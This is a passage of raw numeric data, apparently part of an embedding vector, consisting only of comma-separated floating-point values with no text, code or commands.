96,-0.025822243,-0.008693177,0.017110657,-0.040093694,-0.032824464,0.012132827,0.018358162,-0.040358875,-0.0033417016,0.018041678,-0.0041522146,0.012410301,0.019283086,0.005365007,-0.008493049,-0.011273456,-0.0137676615,0.010762847,0.010441842,0.023558661,-0.0075671095,-0.025568953,0.00014442476,-0.009453675,0.006692924,-0.0141950855,-0.015422769,0.020723056,0.010488961,0.01745659,-0.009727838,-0.02719108,0.010342354,-0.0055429908,-0.020277457,0.0036561375,-0.024656571,0.02728491,0.0054385294,0.043772534,-0.01898602,0.035921484,0.03377856,-0.013229203,0.01536703,-0.007854403,0.015817922,0.026378065,0.016597556,0.0058474117,-0.012399124,0.0123158675,0.00821715,-0.020951761,-0.009593278,-0.00656907,-0.009925973,-0.02030948,-0.017842948,-0.0030016685,-0.011495588,0.007985774,0.015640838,-0.012812776,0.01864976,-0.009956146,-0.0008667338,0.023028443,-0.015834713,-0.0071758134,-0.0069504823,0.023864456,-0.036332652,-0.03617286,0.022112649,-0.023403686,0.024112012,0.0057129054,-0.03805238,-0.035895117,-0.021599934,0.0075902324,0.0028222874,0.014770443,0.022225419,-0.010695613,-0.008036268,0.011347311,0.010612168,0.018260302,-0.02582963,0.012712753,-0.0059171384,0.005553325,0.00508476,0.012470681,-0.0013606569,0.002910173,0.0054211374,-0.017480046,0.023558773,0.0022635036,-0.0070236647,-0.0056863697,0.020983187,-0.017821837,-0.010982728,0.023298092,-0.00941275,-0.0059036966,0.0024524229,0.016540052,0.0035081466,0.008180348,-0.044727188,-0.0102620935,-0.0040379423,0.014541658,-0.0072480333,-0.0045036925,-0.0013534473,0.0058462135,-0.0015368682,-0.00024161112,0.021648962,-0.0027046488,0.0050787283,0.01995549,-0.0055005504,-0.026671631,-0.031546205,0.006892936,0.0075023924,0.005534679,-0.00309694,0.0006567165,0.020090956,0.02017911,-0.016353663,-0.017535925,0.0082663605,0.0049780505,0.014954051,0.021408623,0.0075245574,-0.009615926,0.0073737255,0.024975207,-0.046301086,-0.013222491,-0.013720353,-0.005797294,0.025104966,0.019202502,-0.0016323354,-0.0072955536,-0.0024679722,0.03190648,0.0017384394,0.014741474,-0.0070407484,0.018489799,0.007943906,-0.008434703,0.0046070484,-0.013820455,-0.020472249,0.010291953,0.0040035276,0.00015134386,0.03777338,-0.0027565127,0.012518824,0.008456416,-0.00080531416,0.015490057,0.013770967,0.0033153878,0.02991184,0.031526223,-0.0074805305,-0.00998001,-0.0110590095,-0.03860827,-0.011845212,-0.015543556,-0.018672608,-0.015347421,-0.0059297,0.021071002,-0.017443892,-0.0058676247,-0.02026296,-0.06429786,0.01686469,-0.006477583,-0.010406271,0.003215987,0.015100578,0.015560028,0.0050048237,0.032730117,-0.0098428605,0.016634518,-0.0006735963,0.010457697,-0.0059126494,0.005971246,-0.011719371,-0.0420159,0.011194471,0.028584005,-0.005804408,0.009125309,0.005481426,0.0054930113,0.01088868,0.043409843,0.007855565,0.009167943,-0.008726099,-0.009851521,-0.018739287,-0.012370942,0.021457495,-0.016323557,0.012084559,-0.015875194,-0.0049988898,0.014925642,0.017549478,-0.00933802,-0.016434444,-0.011049382,-0.0064575393,0.007954067,0.03648062,-0.0030795997,-0.032827873,-0.005987366,-0.0029873908,0.023788199,-0.037890013,0.02655948,-0.006472765,-0.019875402,0.015280704,-0.009869742,0.034328595,-0.023949727,0.006031917,-0.0026724963,0.018168168,-0.005678962,-0.0005174506,0.01529836,0.0072749523,0.0005008951,-0.016771264,-0.0074806926,0.038934954,-0.0044777165,-0.014911951,0.003067423,-0.0010385963,0.01216758,0.00022083982,-0.0062448923,0.010164469,-0.01327302,0.010646059,-0.00444639,-0.01664743,-0.022818202,0.0029764497,-0.025089199,0.007549351,-0.043434303,-0.0031620488,-0.0074455775,0.0067902436,0.0051941653,-0.0059701684,-0.020541638,-0.001563217,0.010443851,0.012862341,-0.00070173363,0.028156752,0.011167049,0.017860226,0.011760058,0.010681004,0.02337562,-0.012356409,-0.03466431,0.03721015,0.014788009,0.0010713857,0.025022594,0.010955891,0.030373426,0.020519733,0.009492133,0.014594103,0.01897409,0.0026382313,0.013806147,-0.008533768,0.0041720755,-0.0041946284,0.03531156,0.0294258,0.0011983154,-0.0025921306,0.027104102,0.008536464,0.007904339,-0.00044724953,0.0064551462,0.009992465,-0.014533775,0.0037660142,0.011021295,0.025423966,0.006633556,-0.0042507024,-0.007768291,-0.00821767,0.006105325,-0.02424629,-0.0239902,0.01714107,-0.034039646,-0.0047897315,-0.005919733,0.008270439,-0.016206326,-0.011282119,-0.0014409361,0.00097423996,0.011179428,0.0070143896,-0.013226904,0.027125495,0.007773521,0.006931967,-0.016460523,0.013383143,-0.012288758,-0.03723221,0.006426999,-0.013033016,-0.004132876,-0.017364325,-0.013563483,-0.016310817,-0.021229925,0.0080808075,0.006743664,-0.027857387,-0.012862171,-0.008116835,0.015866676,0.0244047,-0.00033039026,0.036351435,0.0040853443,-0.036188286,0.017520618,-0.0024982593,-0.016354227,0.023832563,0.007114941,0.031950932,0.018549139,-0.022170303,-0.000025436433,-0.007489207,0.0006912435,0.008375674,-0.023391426,-0.008667391,-0.005611306,0.0046584886,0.0043982714,-0.009490572,-0.03332724,0.025285289,0.0074154544,0.008089223,-0.0006782312,-0.0027929167,0.005652545,0.004106919,0.006558351,0.0051889704,-0.024930885,0.015241927,0.019762894,-0.03414582,0.012508612,-0.0069692815,-0.025453417,-0.016097408,-0.000020968626,0.002500325,-0.021570785,0.006109918,-0.03219281,-0.00803622,0.021318702,-0.008250859,0.007962086,0.01534524,0.026822168,-0.0031209125,-0.010131432,-0.009127002,0.0030226856,0.00856972,-0.013541158,-0.008505969,0.048508827,-0.01625939,0.028218754,0.012369583,-0.01451742,-0.00224589,0.012994921,0.0066900966,-0.020759383,0.0026407666,0.005398342,0.0030833578,0.010784004,0.0007725222,0.009866849,0.047557313,0.0010321201,-0.006479612,-0.007067534,0.013905834,0.0037448835,0.015050054,-0.0009342924,0.0122381,-0.03439306,0.0024629948,-0.015081792,-0.007846847,-0.010253605,-0.009951035,-0.016172944,-0.01595786,-0.01437138,-0.013261868,-0.012724751,-0.0073991045,0.0019138133,0.0063528093,0.03971402,-0.013712525,0.0020435129,0.008497569,0.017222641,0.008887506,0.00046072094,0.0011705952,-0.0060000885,-0.014201488,0.008469692,0.007614158,0.001363966,0.0075855916,0.008688424,-0.03369803,0.0029056778,0.024676178,0.007063998,-0.00042602225,0.027524184,-0.027617263,-0.014160773,0.009582457,0.0054159737,0.01851223,0.002547673,-0.009740146,0.0008666205,-0.018903881,-0.014897918,-0.007889066,0.07953719,-0.0025419814,0.008460183,0.002293451,0.025414953,-0.01342015,0.017766679,0.018687835,0.0023907968,-0.012610682,-0.035726722,-0.006998071,-0.0019879087,-0.016539335,0.014795204,0.0024483763,-0.014557233,0.028888948,-0.0026657288,0.011939245,0.0034130928,0.004502029,-0.0037085365,0.014837523,-0.007580237,0.009415687,0.011649478,-0.008550288,0.012274306,0.0018194396,-0.005752107,-0.010977917,0.020353708,0.0068875807,-0.000027991551,0.00041599802,0.0033371688,-0.025437066,-0.007818557,-0.0015841787,0.014115673,-0.00669344,0.062090795,0.013057713,0.0060437354,-0.0035716144,-0.007757468,0.0047058193,0.012329411,-0.027295643,0.0040269727,-0.021502277,-0.020520927,-0.010499177,-0.0012894946,-0.0027957198,0.009710408,0.04121408,0.028934764,0.0061736954,-0.0033205457,0.022287995,-0.009918219,-0.011899914,-0.0037659642,-0.005122302,-0.027816664,-0.009501503,0.038254004,-0.022035662,0.0056677996,-0.0127524305,-0.0014346498,0.00371712,0.00344289,0.007707422,0.016161138,-0.017754246,-0.027564025,-0.027377613,-0.010383312,0.0006633118,0.038525805,0.040166356,-0.009345772,0.025942467,0.015125019,-0.018016549,0.046087783,0.020136619,0.041251127,-0.0060499706,-0.0015107791,0.010314221,0.010426833,0.02219412,-0.002423543,0.013539189,-0.02073891,0.0126947975,-0.0100698685,0.022211054,0.01866464,0.0010182816,-0.009806619,-0.010003201,-0.0007017924,-0.030599345,0.02003263,0.031890567,0.018586405,0.0055303928,-0.005161744,0.0154611,-0.0058017587,-0.029018516,0.012870738,-0.0043800175,-0.008089779,0.0068269726,0.0010394824,-0.0069159097,-0.014554763,-0.043311268,0.031296212,0.1436297,-0.0038120763,0.00041182784,0.0065118233,-0.010419849,-0.006709395,-0.112142466,-0.0059004216,-0.008295666,-0.005187445,-0.014098495,-0.002161282,-0.020547366,0.02113982,0.0054002274,0.002735755,-0.0068862434,-0.014846655,0.01949033,-0.010014985,0.01180256,0.009585228,-0.0043025687,-0.013366965,-0.008134422,-0.015475183,0.021214284,-0.025224395,0.010198129,-0.01735075,0.0026338464,-0.010689585,0.017994082,-0.007994467,-0.027563512,-0.0030046133,0.0237678,0.019156586,-0.027532035,-0.0015282572,0.02464668,0.009781542,-0.024201311,-0.037819684,-0.15612005,0.029417606,-0.018525159,-0.051947124,0.017705742,0.005997387,0.0040453007,-0.0037473629,0.007957393,-0.041445,0.009884274,0.006716275,-0.021348622,-0.017758893,-0.0071730884,-0.022678073,0.035342287,-0.004070906,0.017566124,0.011251,0.016468406,-0.022535041,-0.020590045,0.00036224473,-0.0191174,0.019365575,0.012670924,0.025182992,0.0014486411,-0.005758874,-0.010737433,-0.003505037,-0.028252732,0.014106375,-0.0045879944,-0.017264083,-0.013921668,0.017337063,-0.018041624,0.017696787,0.02949025,-0.012927714,0.00016454159,-0.0020243682,0.0035831914,0.015393194,-0.00005853326,-0.0030770563,0.010508408,0.005880566,0.013165016,0.0026374008,-0.011723309,0.0007456433,-0.022275643,-0.0007476993,-0.00550695,-0.032264806,-0.01615161,-0.0011400941,-0.015219617,-0.02876851,-0.010533851,-0.019821472,0.010160009,0.0023762856,0.0007275919,-0.045148496,-0.0065111867,0.006411125,0.0122463135,0.00879579,0.0073447847,-0.026151016,0.01077082,0.021213787,-0.018103288,0.009522648,0.0021643348,-0.022225663,-0.005839489,-0.028343583,-0.006633796,-0.020578492,0.0006309771,-0.0018275137,0.0019641458,-0.00027942652,0.0021049283,0.0009708578,0.011172132,-0.0005336592,0.017861523,-0.00570332,0.013889951,0.010935554,0.033633538,-0.005560895,-0.019787872,0.015213992,-0.0012390108,-0.011440581,-0.019500868,0.0037201205,-0.015263565,0.0034908885,-0.014717689,-0.030297704,-0.022277692,0.002041069,0.014017996,-0.008210987,0.009826489,0.009302914,-0.017503204,-0.021114407,0.007902183,0.020466654,0.0018896407,-0.015945652,-0.027095824,0.005465089,-0.016788628,0.0039455234,0.045233224,0.0002138051,-0.041611273,-0.007452841,-0.0023498528,0.0042427434,-0.037502185,-0.0014538984,-0.000092889684,-0.0037540419,-0.013630147,-0.008936108,-0.023370232,0.008072056,-0.003982888,-0.015924301,0.0031048777,0.0003234279,0.0042826203,0.0055354782,0.0128476815,-0.03883302,0.043288175,-0.011894675,0.008159724,0.012755004,0.012044309,0.029540908,0.000962003,-0.0032437455,0.0025080538,0.072818786,-0.003365717,-0.025769966,0.027463501,0.00025486707,0.00004897261,0.029091397,-0.009178326,-0.018432345,-0.016901426,-0.032478224,0.0022691435,-0.008199066,0.029222649,-0.021671757,0.019932,0.028637713,0.0010544724,0.011535367,0.0046957824,0.01295629,-0.016467404,-0.0059841196,0.017394977,0.0023046185,0.009646861,0.014429363,0.0032989345,-0.008142907,0.0100131435,-0.0121397,-0.010325525,0.005245777,0.0069630705,0.024262633,-0.040260997,-0.01651386,0.0029631348,0.014434097,-0.014682455,0.0148223,0.007156059,0.0065583973,-0.036503647,-0.0018224965,-0.016639808,-0.006682086,0.0076727984,0.010721261,0.009130359,-0.00016811727,0.019140938,0.022012742,-0.008628602,0.02130936,-0.011138973,-0.008172704,0.004247537,0.001305801,-0.02011358,0.023280002,-0.009639809,-0.027944192,0.0049291826,-0.00041062184,0.014056226,-0.0068831,0.0008404517,0.008493423,0.02673709,0.004522143,-0.0070409128,-0.0063345544,0.010718869,-0.0012431521,0.009219857,-0.013414523,-0.009755436,-0.016388435,0.027164076,0.0075990628,0.029789746,-0.0025111733,0.0027852054,-0.017286155,-0.03997287,-0.022115462,0.027835837,-0.020774532,-0.0029555007,0.008800587,0.0033545997,0.02006707,0.007688798,0.01062295,0.018325323,0.007754993,0.0025294025,0.024487738,0.0035460608,0.017427722,0.01657355,0.0059085176,-0.013057189,0.014628987,-0.015538011,-0.0043147462,0.0074942615,0.0022722222,-0.022066846,0.0058785896,-0.027142627,0.014712003,-0.024440505,-0.032192204,0.044681735,-0.01437699,0.018386917,0.0142546985,0.0018969888,-0.0075257607,-0.006059965,-0.010409362,-0.0038107673,0.022501733,0.004669032,-0.009484651,0.000046275753,-0.024418117,-0.00025228038,0.010645278,0.038341705,0.022464331,-0.017630763,-0.032720007,-0.006061839,0.007408199,0.0364039,-0.0002151733,-0.00047172105,-0.01836975,-0.00542317,0.005352369,0.020069862,-0.022114696,0.020399466,-0.010678388,-0.0013975861,-0.026403816,0.007868625,-0.023796968,0.003165191,-0.0012311531,0.00011410316,0.013147327,0.008061065,-0.03886104,-0.0048078424,-0.022119246,-0.027759379,-0.00987392,0.01318268,-0.011642676,-0.01460626,-0.009265714,0.005066963,0.030337712,-0.0061409264,0.0025159358,0.0040686065,0.0075010513,-0.020750038,-0.01730223,0.0017410739,-0.011961427,-0.017807946,-0.011731125,0.019137792,0.0032004279,-0.006842695,0.0021440978,0.023881702,-0.017299052,0.013803908,0.010294361,0.022302052,0.009540177,0.046303976,-0.0042152754,-0.0064271186,0.011093854,0.014032412,-0.0179003,-0.021661442,-0.027057046,-0.0072833975,0.012228144,0.00034751883,0.018149175,-0.0002988472,0.012101671,0.011792776,-0.013325006,-0.011016444,0.023095034,-0.004584642,0.00431741,0.006963591,0.000056974885,-0.0018106803,-0.005428132,-0.007549182,-0.019825531,0.005190411,0.0055001434,0.014432588,-0.013314804,0.018032772,0.009271609,-0.027696565,-0.0030395007,0.0038603381,-0.0026827615,0.011171716,-0.008518957,-0.00201189,-0.015921604,0.04222245,-0.037367478,-0.019763568,0.010319104,0.026665887,0.015278474,-0.010649844,-0.0028530587,-0.020653985,-0.024785584,-0.01970853,-0.043138873,-0.0015516549,-0.0022480437,-0.02695013,-0.020812593,0.000608,0.0024170377,-0.0013710845,-0.0019560377,-0.004449287,0.005386717,0.00775247,-0.0013751843,-0.01010317,-0.024934664,0.011551827,0.018837199,-0.018664364,-0.004631283,0.018444227,-0.009172678,-0.017675472,-0.013248361,-0.013190592,-0.005441844,0.0052126786,-0.012697704,0.00079680904,0.010796679,0.030144256,0.014350355,-0.01126456,-0.0072439015,0.0022987395,0.010519431,0.0030885423,-0.0009859359,-0.009206904,0.016809419,-0.000022875405,-0.003263518,0.015297244,0.023383662,-0.013619725,0.021441646,0.012896114,0.002754927,-0.027286038,0.012501711,0.016752047,-0.0125096785,-0.040542737,-0.008320116,0.016157577,-0.0013401414,-0.0044380417,-0.007571421,0.0022962356,0.005118219,0.0020066218,0.018029712,-0.003765546,0.01048415,0.012057621,0.0035554338,0.0077496893,-0.0014558126,-0.009263966,0.03600231,0.003229862,0.00026453775,0.0029752436,-0.018324569,0.00992671,0.0053452887,-0.0050325994,0.026568685,-0.008386748,0.015079682,0.030304356,-0.011779673,0.005268708,-0.017572328,0.0023768658,-0.013065467,0.0019873604,-0.005315737,0.0031158854,-0.024638113,-0.015844082,-0.007823117,-0.009381771,0.00051316724,-0.017432595,0.0016722127,-0.15858307,0.00458905,-0.015406874,-0.015995927,-0.014867373,-0.0063322526,0.010591041,0.046966873,-0.00019949804,-0.011956791,-0.008721315,0.03743251,0.018914182,0.014692462,0.012363366,0.0008287305,-0.026265424,0.0029627779,-0.026019331,0.0052669775,0.024625057,-0.023563856,-0.024081398,-0.019767812,0.019220559,0.0027723026,0.011195515,0.014709592,0.03245751,0.01954305,-0.0046289954,0.0020318048,0.0059271585,0.014508085,0.0040826956,0.019685322,0.01620171,0.025716417,-0.0009901078,0.0068065743,-0.013227,0.0016730962,0.00043626418,-0.006970925,0.012934786,-0.01495571,-0.0039174827,0.02722881,0.014042409,0.016482027,-0.020245858,0.0009621238,0.010009686,0.0050926404,-0.01993779,-0.023753092,-0.00062954926,0.0043485337,0.005229397,0.0073266746,-0.013515481,0.0013847625,-0.008078634,-0.010678461,-0.004093336,0.0047753137,-0.010104617,0.0053233015,-0.001662568,-0.006150545,-0.016108463,0.020163778,0.0042201164,-0.0038446165,-0.010035111,0.01046942,-0.006382999,-0.005223288,-0.014682042,0.018553007,-0.042384878,-0.0015390088,-0.008341216,0.012541873,0.005956618,-0.021163145,0.011661193,0.004533888,-0.0020229234,-0.0025687465,0.015870579,0.002912548,0.0013919045,-0.03410472,-0.0016384801,0.006574498,0.00323413,0.018211978,-0.003370878,0.006576615,-0.018698864,-0.009281959,0.018363457,-0.037546236,-0.13223659,0.011400059,0.037530243,0.009109517,-0.007755414,-0.040506963,0.032192808,0.0020960637,0.029027026,0.0050216448,-0.019684706,0.0060950937,-0.027003942,0.0013011866,-0.0057865945,0.003568353,-0.024675548,0.011932471,0.0051920065,-0.011135193,-0.0067441748,-0.02847339,-0.022475677,0.009774104,-0.00044328865,-0.002432823,-0.003740056,0.043239005,0.014079334,-0.0059165196,0.004695952,0.0057584113,-0.007230603,-0.0032665026,-0.07232315,-0.0034843204,0.006485039,0.004463986,-0.00063484255,0.021070985,-0.012177649,-0.011309936,0.009750883,0.011636448,-0.0023618024,-0.0024513348,-0.005344612,0.009181127,-0.0056462483,-0.013232838,0.009163821,0.004880947,0.0024386188,-0.004061203,0.0010181619,-0.013691252,0.010463127,-0.002630598,-0.0050605433,-0.0032410838,-0.010606943,0.010608796,0.008863582,0.0050676838,0.0054468997,0.00972074,0.0042642234,-0.002040388,-0.004831898,0.0119831525,-0.012076922,0.016218355,0.028604893,-0.017053267,0.027361186,0.0033915578,0.0017819717,0.046462003,0.017614586,-0.007839588,-0.0056144493,0.008024861,-0.0033743682,0.004647025,-0.012209506,0.01656214,-0.007189359,0.012251034,-0.008499783,0.03078555,0.014665584,0.013065738,0.008520136,0.030851766,0.01941419,0.00061354646,0.03610236,-0.00482762,-0.007814771,-0.011623177,-0.021640524,-0.02185277,-0.007927672,0.028280634,-0.012972033,0.034121994,0.012724096,0.008672791,-0.009725477,0.000037037655,-0.007271256,0.009836805,0.005635678,0.0034240156,-0.032842442,0.016743794,-0.023851627,0.018938279,-0.013801353,-0.0030681128,-0.014948194,0.002138035,0.013891473,-0.021485664,0.0001246176,-0.018559404,-0.0066273287,0.03667676,-0.009752146,-0.023263903,-0.0036613161,0.013723286,0.027836844,-0.014429732,0.004570664,0.014822213,-0.014968725,-0.0026151238,0.0071169594,0.00075908634,-0.00009192489,-0.006914118,0.009157246,-0.011826282,-0.014235706,-0.017963286,-0.013325249,0.016580075,-0.012847764,0.0036288626,-0.007946939,-0.005940133,0.011379697,0.01024047,0.01826295,0.0029469507,-0.035261687,-0.0064109573,0.0036660363,0.012468781,-0.016277434,0.024463318,0.028543022,0.0063915295,-0.009017258,-0.026652493,-0.017684594,-0.0009638624,0.0015659383,0.00081578386,0.017308442,0.0029740399,-0.0020342725,-0.026570482,0.03600269,-0.0015521855,0.009602676,0.019369666,0.023299176,0.022676736,-0.023643956,-0.0018955338,-0.012328598,0.00686936,0.0036897124,0.016340747,-0.012850758,-0.005882237,0.00093242596,-0.022675987,0.029982213,-0.003207033,-0.008457051,-0.013385926,0.016762832,0.0030019477,0.0053287824,-0.012859607,-0.010913929,-0.021796191,-0.023987114,0.016251924,0.016629612,-0.0077499603,-0.012678888,0.0060794563,0.006360583,0.027674427,0.004593216,-0.016090808,-0.024275584,0.0039735516,-0.005640544,-0.007086651,0.01417272,0.010381291,0.0071951146,-0.010062261,0.00031976742,0.019081708,-0.013701219,-0.023448274,0.003506071,-0.012831129,0.015872201,0.019841757,0.034620028,-0.0010103704,-0.026183462,-0.019465696,-0.0073846197,0.0038520778,-0.005841627,-0.011044435,0.02299217,0.02977756,0.024537563,-0.0061136764,0.0067443172,0.00546784,0.029118733,0.041194607,0.029481797,0.0046025477,0.013299381,-0.011488395,0.017042229,0.019255469,0.010281349,0.025937866,0.002086838,-0.0021503118,-0.0046781893,-0.009379013,-0.013789969,0.0027230163,0.00960797,-0.0045673614,0.0008352745,0.012492751,-0.008911926,-0.005561398,-0.016032804,-0.018479656,0.00869059,-0.009900067,-0.0006620147,-0.022552555,-0.0019140404,-0.0032617066,0.004651413,0.008472443,-0.010560158,0.013364616,-0.013119248,-0.0054691928,-0.0031448891,0.0090767,-0.0028578488,-0.002787237,0.0015820262,0.004454052,-0.014577618,0.02381636,0.023241984,0.015595945,-0.005401757,-0.01296057,0.0121476855,-0.008235393,0.020864623,-0.0014800245,0.002675732,-0.019534513,-0.022839764,0.03312511,0.019866781,-0.010239641,-0.011019888,0.015598077,0.008447041,-0.00041364762,0.0087648025,0.00052378373,0.013590245,0.019058399,0.005372193,0.023123093,0.0058873547,-0.0140436925,-0.010150197,0.012506589,-0.006556763,0.022013878,0.0005946911,0.0054296297,0.003424483,0.0110946,-0.04169931,-0.016313946,-0.017846253,0.011267732,0.008720078,-0.026004791,0.026078591,0.0059927027,-0.014662691,0.024227675,-0.017398622,0.0090711545,0.034386307,-0.040094595,-0.0013777949,0.011149981,0.018219916,0.0035695634,0.01727524,0.026638266,-0.0016691262,0.011201452,0.014324189,0.0058072545,-0.00953311,-0.00010841407,0.009491414,0.0047718873,0.016716853,0.0029273834,0.00552572,-0.0034041936,-0.0067290743,0.001933177,-0.002163139,0.014461319,0.00077027275,0.026637785,-0.04597204,-0.010173972,-0.0040720794,-0.005424771,-0.0060554384,0.014335062,0.00831583,0.006835389,0.0019628392,0.00695968,-0.038303457,0.012575678,0.002390829,-0.0011804919,0.009673385,-0.00035321497,-0.02330331,-0.011736293,-0.005926103,-0.07441273,0.0048455694,0.021550355,-0.007965554,0.047819477,-0.0005151049,-0.011103603,-0.015725795,0.017427437,0.0099267885,0.0051746923,0.0035555556,-0.032699775,-0.017213762,0.017696343,0.001304441,-0.0008677953,0.009455224,-0.0049159247,-0.01974389,-0.0029070145,0.0013166338,-0.014957529,0.009383885,0.004554548,-0.0039248024,-0.007827505,-0.018041346,0.01996451,-0.005798897,-0.016846472,0.003024413,0.007562106,0.013256988,-0.0007279579,-0.01909146,-0.014402963,0.009713217,-0.024207124,-0.024598785,-0.00718109,0.019512175,-0.002098612,0.007576187,-0.016797643,-0.00072018715,-0.03769325,-0.006257102,-0.0021109958,-0.0016967134,-0.019692615,0.018291617,0.011212993,0.010573693,-0.0079810545,0.012739283,0.008724282,-0.018456893,0.020108161,0.008190455,-0.006773815,-0.013183474,-0.018990606,-0.012516199,0.008775216,0.0054982193,0.008275863,0.015853489,-0.008421246,0.014880984,-0.013779344,-0.026497124,0.0061655366,-0.02569125,-0.0014360587,0.008890315,0.008309121,-0.013395674,-0.027758595,0.008154694,0.04255401,0.00010723133,0.013262506,0.0044983346,0.011278063,-0.009466028,-0.0070715593,-0.022183588,0.03169121,0.007570253,0.0018319363,-0.008312779,0.03193128,0.007197007,0.0081161205,0.012988519,-0.010976412,0.010247861,0.024353513,0.002340908,0.009117488,0.0057307803,-0.0042495164,0.0030111193,-0.021508023,-0.00093696825,0.0031965475,-0.025431251,0.0064803385,-0.010423246,-0.011937368,0.015209814,0.026923709,0.036137283,0.009280416,0.0074489424,-0.008735565,0.020091908,-0.034493938,-0.0008876924,-0.00091105956,-0.012226724,-0.026938286,0.037264444,0.0010036859,-0.016517103,0.0014605216,-0.018575074,-0.001982492,0.010672289,0.0068409494,0.033088207,0.01190165,0.019557172,-0.016444365,0.0029063534,0.0066806637,0.020495048,-0.011480509,0.015386566,-0.0038628618,-0.0027819485,0.0055161756,0.0022912703,0.0008343534,0.014377272,-0.0042967587,-0.031136995,0.0057802135,-0.0058205947,-0.0014294082,-0.004132904,0.017131552,-0.0047090007,0.0046406602,0.0067706243,0.011917978,0.0015721163,-0.012678949,-0.008782915,0.016891932,0.0016996354,0.0081246095,0.0032529007,-0.024025347,0.014201553,-0.0041011646,-0.010779712,-0.0054586786,-0.020982321,-0.0028575137,0.020699179,0.0100766,0.0042589377,-0.022773134,-0.012847296,0.007822075,0.031429622,-0.0023408697,0.008096988,-0.011649537,0.0111171715,-0.021770246,-0.01404666,-0.0010775253,-0.006191473,0.00011562024,-0.010503099,-0.00060799817,-0.011123319,0.011638786,-0.007822086,-0.031112008,-0.014422231,-0.0079374965,0.00061521394,0.010503179,-0.013845812,-0.016743181,0.018789055,-0.014139388,0.0038890545,-0.011754406,0.014201334,0.04094887,0.007848374,0.01657099,-0.002038835,-0.008232108,-0.009461234,0.006432598,-0.03760236,0.0189395,0.13100936,0.007614477,-0.018244121,-0.0123550845,0.022901595,0.0076462585,0.0016644996,-0.007980771,-0.00222132,0.003420763,0.020904282,-0.018569933,-0.0014333465,-0.024084244,-0.014656545,0.009684978,0.01093355,-0.0093711,0.0043606437,0.02470983,0.01930064,-0.013242941,-0.026229525,-0.02853115,-0.02940274,-0.03300968,0.013092286,0.007104926,-0.0004242593,0.025197018,0.0074022165,0.003634996,-0.02428859,0.002565619,-0.024094515,0.007203361,0.0006187337,-0.02511267,-0.012058163,-0.02410246,0.013062539,-0.00066584954,-0.004271351,-0.031928696,0.010409124,-0.0048911194,-0.014569854,-0.009820652,0.016497113,-0.029977703,-0.005058993,0.0027675712,0.007227435,-0.023321582,0.018624794,-0.00680124,-0.015084831,0.0071669626,0.0046891277,-0.0143161435,-0.017869119,-0.005341515,-0.015929194,-0.020863887,0.016525803,-0.0019722437,-0.00971771,-0.020034172,-0.0028076337,-0.006853935,0.008688322,-0.012811913,-0.002646856,-0.004129381,-0.013731346,0.010908502,-0.0058736973,-0.013481852,-0.012760819,-0.0022548297,0.0071484167,0.019303741,0.015370075,0.010787213,-0.0057606203,0.0067420397,-0.003594954,0.008740878,-0.013718572,0.0099812625,-0.013765697,0.012863662,0.030287739,0.010592452,-0.021437833,0.012692492,0.01978936,0.011975833,-0.007755328,-0.02030432,-0.0047620344,-0.0046113315,0.003774888,-0.011996716,0.006823023,-0.0073915212,-0.006138504,0.02025679,-0.018123507,0.0209918,0.006728874,0.03296835,0.009146462,0.0106104035,0.0010821234,0.028816642,-0.027556121,-0.013717861,0.003655642,-0.0063459664,-0.0101997135,0.015904358,0.009182577,0.03738123,0.017617114,0.024416633,-0.004775695,0.017974727,0.010343311,0.0047529708,0.019871991,-0.021521341,-0.0026779566,0.003186011,-0.005877609,-0.0090850415,0.008121226,0.013879278,0.017201617,0.009312424,0.021883132,-0.0119517315,-0.017274221,-0.015027661,-0.0046754247,-0.007768859,0.033034142,-0.008402284,0.010523496,-0.003375538,0.014191658,0.0056185042,-0.004484159,0.00003930735,-0.017385226,-0.000532157,0.00063056825,0.0075115375,-0.0017454376,0.0094776,0.022573989,0.0014264629,0.011082987,-0.042879205,0.027821705,0.01290181,0.022574978,0.0007664439,0.0031435294,-0.0020660649,0.011966096,-0.008781497,-0.013148382,0.034524255,-0.007737205,-0.0057000364,-0.008379626,0.023424083,-0.004945892,0.007278847,0.026813896,0.012037081,-0.028576378,0.0061628395,0.028104158,0.005487418,0.010469887,0.020227969,-0.017439809,0.040541615,-0.016572362,-0.010529342,-0.0019063599,0.016677368,-0.015543347,0.004943075,-0.030450055,0.0354547,-0.039368033,-0.046259537,0.0005429846,-0.0060241977,0.012115117,-0.012662029,0.012440064,-0.006135888,0.0076630116,-0.010979299,-0.0016225564,0.0017157631,0.008004965,-0.01071215,0.011864371,-0.016842565,0.004091028,0.003034894,-0.004991748,-0.023891794,-0.00030332932,0.016299123,0.012910382,0.015993012,-0.0021334374,-0.0009523451,-0.003884518,-0.0051571704,-0.01937003,0.0073080915,0.009751606,-0.017776916,-0.015137297,0.022396516,-0.0011019807,-0.002838664,-0.016884632,-0.0038041694,0.024714718,0.016784167,0.0022061232,-0.013990262,-0.002799477,0.02137519,0.035500124,-0.01372215,-0.026451645,0.0049505355,-0.02104025,-0.010017706,-0.0009835033,-0.020919342,-0.036729146,0.014047935,-0.0033887676,-0.011017406,-0.0320184,-0.007256864,-0.016618593,0.026865134,0.012156538,-0.015138403,0.0061215614,0.016178476,-0.010522114,0.018380681,-0.012495419,0.010519094,0.0075567495,-0.016921408,0.00011460036,0.015790112,0.015502967,-0.0029724408,-0.01394763,0.0140390275,0.021557396,0.018741015,-0.0019157581,0.0009353011,0.0054814527,0.0010829901,0.011727733,-0.026596794,-0.011803724,-0.024383787,-0.0023122097,-0.002073664,-0.004292322,0.026461883,0.05834431,-0.04965384,-0.0014829267,0.0032640111,0.0047893664,-0.045974802,0.016194336,-0.01394871,-0.0439821,-0.0278004,0.011832244,-0.008633647,-0.024567664,-0.027879095,0.018916445,0.011676482,-0.005023551,-0.015477566,0.008878129,-0.016858587,-0.013162782,0.019312121,0.005492289,-0.0009397552,0.0047849724,0.008461535,0.0035335359,0.0033300319,0.012483141,0.0011482192,0.019264715,0.006451236,0.0063847927,-0.01892424,0.0022643092,-0.0062520904,-0.015571497,0.016061923,-0.019121297,-0.023482868,-0.04328187,-0.013616704,-0.00008150301,0.022524798,0.00016146296,-0.006217892,0.0005983426,0.026089743,0.014196861,0.13462283,-0.01876893,-0.0007591584,0.001990323,-0.005900608,-0.038097657,-0.007911095,0.021278316,-0.0007925401,0.011990411,0.018904911,-0.020397345,0.008579535,0.032584973,0.0015739481,0.017288016,0.0127640115,0.101581715,0.0023088697,0.031294726,0.010203182,-0.010037886,0.0033700897,0.01108607,0.019516842,-0.09151978,0.0025383933,-0.02429904,0.010609452,-0.005133667,-0.036347147,0.024670312,0.026557894,0.0071429736,0.004491349,0.01376525,0.0009828275,-0.0056526647,-0.016954485,-0.025833